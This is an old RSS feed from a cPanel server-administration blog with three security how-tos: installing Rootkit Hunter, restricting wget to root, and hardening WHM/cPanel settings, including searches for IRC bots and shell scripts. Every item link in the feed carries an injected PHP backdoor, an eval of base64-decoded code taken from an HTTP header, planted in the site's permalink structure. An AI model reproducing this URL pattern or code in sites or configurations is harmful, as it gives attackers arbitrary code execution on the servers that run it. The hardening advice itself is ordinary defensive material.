cPanelConfig - cPanel server configuration guide » security http://www.cpanelconfig.com The complete guide to setup and manage a cPanel based server Fri, 17 Jul 2009 11:15:39 +0000 http://wordpress.org/?v=2.8 en hourly 1 Install Rootkit Hunter (1.3) http://www.cpanelconfig.com/2007/11/16/install-rootkit-hunter-13/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/ http://www.cpanelconfig.com/2007/11/16/install-rootkit-hunter-13/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments Fri, 16 Nov 2007 08:52:59 +0000 yolau http://www.cpanelconfig.com/cpanel-security-related-articles/install-rootkit-hunter-13/ What is Rootkit Hunter ?

Rootkit scanner is scanning tool to ensure you for about 99.9%* you’re clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:

- MD5 hash compare
- Look for default files used by rootkits
- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files

How to install?

  1. Login as root to your server
  2. Download the package and extract it

    3. wget http://prdownloads.sourceforge.net/rkhunter/rkhunter-1.3.0.tar.gz
    tar -xzf rkhunter*

  3. Run the installer

    4. cd rkhunter-*
    ./installer.sh –layout default –install

  4. Run rkhunter

    5. /usr/local/bin/rkhunter -c


Enjoy !

]]> http://www.cpanelconfig.com/2007/11/16/install-rootkit-hunter-13/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/ 8 Disable wget http://www.cpanelconfig.com/2007/11/06/disable-wget/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/ http://www.cpanelconfig.com/2007/11/06/disable-wget/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments Tue, 06 Nov 2007 13:41:16 +0000 yolau http://www.cpanelconfig.com/uncategorized/disable-wget/ wget is one of the largest threats for your server security. A single abuser that gains access to wget can download and run any script that he wants, totally compromising your server.

It is highly recommended that you allow only root to use wget and you restrict all other users from it.

  1. Login to your server as root
  2. Run the fallowing command

    3. chmod 0700 /usr/bin/wget

Please note that disabling wget might cause some scripts to stop working. A known problem is that Fantastico will stop updating after this. The solution is pretty easy…
Before you disable wget make sure that you do a copy of it with the initial permissions. You can use any name that you want, the fallowing is just an example:

cp /usr/bin/wget /usr/bin/wget_secret


In the Fantastico configuration input the location to wget as:

/usr/bin/wget_secret

If for some reason you you want to revert the change you simply have to do:

chmod 0711 /usr/bin/wget

If you have any questions or suggestions please leave a comment.

]]> http://www.cpanelconfig.com/2007/11/06/disable-wget/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/ 3 Basic security configuration for a new cPanel server http://www.cpanelconfig.com/2007/09/17/basic-security-configuration-for-a-new-cpanel-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/ http://www.cpanelconfig.com/2007/09/17/basic-security-configuration-for-a-new-cpanel-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments Mon, 17 Sep 2007 21:49:30 +0000 yolau http://www.cpanelconfig.com/cpanel-security-related-articles/basic-security-configuration-for-a-new-cpanel-server/ Note: This article is based on a Layeredtech knowledgebase article https://support.layeredtech.com/home/index.php?x=&mod_id=2&id=101

We do not guaranty that the following steps will make your server hack proof, but it will greatly reduce your chances of compromise.

Basic Steps to Securing CPanel (Linux based OS):

These are items inside of WHM/Cpanel that should be changed to secure your server.

Goto Server Setup =>> Tweak Settings

Check the following items…

Under Domains
Prevent users from parking/adding on common internet domains. (ie hotmail.com, aol.com)

Under Mail
Attempt to prevent pop3 connection floods
Default catch-all/default address behavior for new accounts – blackhole

Under System
Use jailshell as the default shell for all new accounts and modified accounts

Goto Server Setup =>> Tweak Security
Enable php open_basedir Protection
Enable mod_userdir Protection
Disabled Compilers for unprivileged users.

Goto Server Setup =>> Manage Wheel Group Users
Remove all users except for root and your main account from the wheel group.

Goto Server Setup =>> Shell Fork Bomb Protection
Enable Shell Fork Bomb/Memory Protection

When setting up Feature Limits for resellers in Resellers =>> Reseller Center, under Privileges always disable Allow Creation of Packages with Shell Access and enable Never allow creation of accounts with shell access; under Root Access disable All Features.

Goto Service Configuration =>> FTP Configuration
Disable Anonymous FTP

Goto Account Functions =>> Manage Shell Access
Disable Shell Access for all users (except yourself)

Goto Mysql =>> MySQL Root Password
Change root password for MySQL

Goto Security and run Quick Security Scan and Scan for Trojan Horses often. The following and similar items are not Trojans:
/sbin/depmod
/sbin/insmod
/sbin/insmod.static

/sbin/modinfo
/sbin/modprobe
/sbin/rmmod

These are measures that can be taken to secure your server, with SSH access.

Udate OS, Apache and CPanel to the latest stable versions.

This can be done from WHM/CPanel.

Restrict SSH Access

Disable Shell Accounts

To disable any shell accounts hosted on your server SSH into server and login as root.

At command prompt type: locate shell.php

Also check for:

locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts

Note: There will be several listings that will be OS/CPanel related. Examples are

/home/cpapachebuild/buildapache/php-4.3.1/ext/ircg
/usr/local/cpanel/etc/sym/eggdrop.sym
/usr/local/cpanel/etc/sym/bnc.sym
/usr/local/cpanel/etc/sym/psyBNC.sym
/usr/local/cpanel/etc/sym/ptlink.sym
/usr/lib/libncurses.so
/usr/lib/libncurses.a
etc.

Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type: /etc/rc.d/init.d/httpd restart

Install chkrootkit

]]> http://www.cpanelconfig.com/2007/09/17/basic-security-configuration-for-a-new-cpanel-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/ 1